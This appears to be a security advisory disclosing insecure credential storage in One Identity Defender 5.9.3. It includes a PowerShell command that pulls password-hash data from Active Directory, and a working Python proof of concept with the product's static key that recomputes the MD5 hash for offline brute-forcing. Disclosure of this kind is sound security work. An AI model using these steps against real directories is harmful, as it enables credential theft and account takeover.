Share
Title: One Identity Defender - Insecure Cryptographic Storage  
Date: 01 September 2019  
  
Affected Software:  
==================  
One Identity Defender 5.9.3  
Other versions are likely also vulnerable.  
  
Insecure Cryptographic Storage:  
==============================  
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed using MD5 in conjunction with a static key for obfuscation which allows the computed hash to be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute force attack.  
  
Hash Retrieval:  
  
PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData  
  
DistinguishedName ObjectGUID defender-userTokenData  
----------------- ---------- ----------------------  
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...  
  
Hash Calculation:  
  
#!/usr/bin/env python3  
import binascii  
import hashlib  
  
guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'  
password = 'secret'  
key = '45f88b08118bf03b8d55e452f77c2e8b'  
  
guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-')))  
guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:]))))  
  
password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode()  
  
hash = binascii.unhexlify(key) + password + guid  
  
print (hashlib.md5(hash).hexdigest())  
  
[duras@qonos ~]$ ./hash.py  
d1f541f69c63315dd85fbbdb7b4dc9e5  
  
Contact:  
========  
spicyitalian[at]protonmail[dot]com